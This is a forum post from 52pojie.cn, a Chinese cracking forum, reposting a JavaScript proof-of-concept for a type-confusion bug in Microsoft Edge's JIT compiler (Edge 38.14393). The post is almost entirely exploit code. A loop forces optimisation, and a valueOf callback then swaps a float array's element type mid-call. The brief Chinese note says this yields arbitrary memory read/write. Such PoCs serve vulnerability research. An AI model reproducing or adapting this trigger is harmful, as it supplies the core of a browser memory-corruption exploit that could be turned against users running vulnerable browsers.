吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 2178|回复: 0
收起左侧

[其他转载] Edge:导致类型混淆的bug

[复制链接]
JackBrown 发表于 2017-3-25 13:35
"use strict";
function func(a, b, c) {
a[0] = 1.2;
b[0] = c; <<<<----------------------- (1)
a[1] = 2.2;
a[0] = 2.3023e-320;
}


function main() {
var a = [1.1, 2.2];
var b = new Uint32Array(100);

// 强行优化
for (var i = 0; i < 0x10000; i++)
func(a, b, i);

func(a, b, {valueOf: () => {
a[0] = {}; <<<<----------------------- (2)

return 0;
}});

a[0].toString();
}

main();

在上面的代码中,假定类型的|a|还是一个本地浮动数组,执行(1)后,可以改变它的类型的处理程序((2)),导致类型混淆。
PoC将复制任意内存读/写。
//Edge38.14393.0.0

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-14 20:32

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表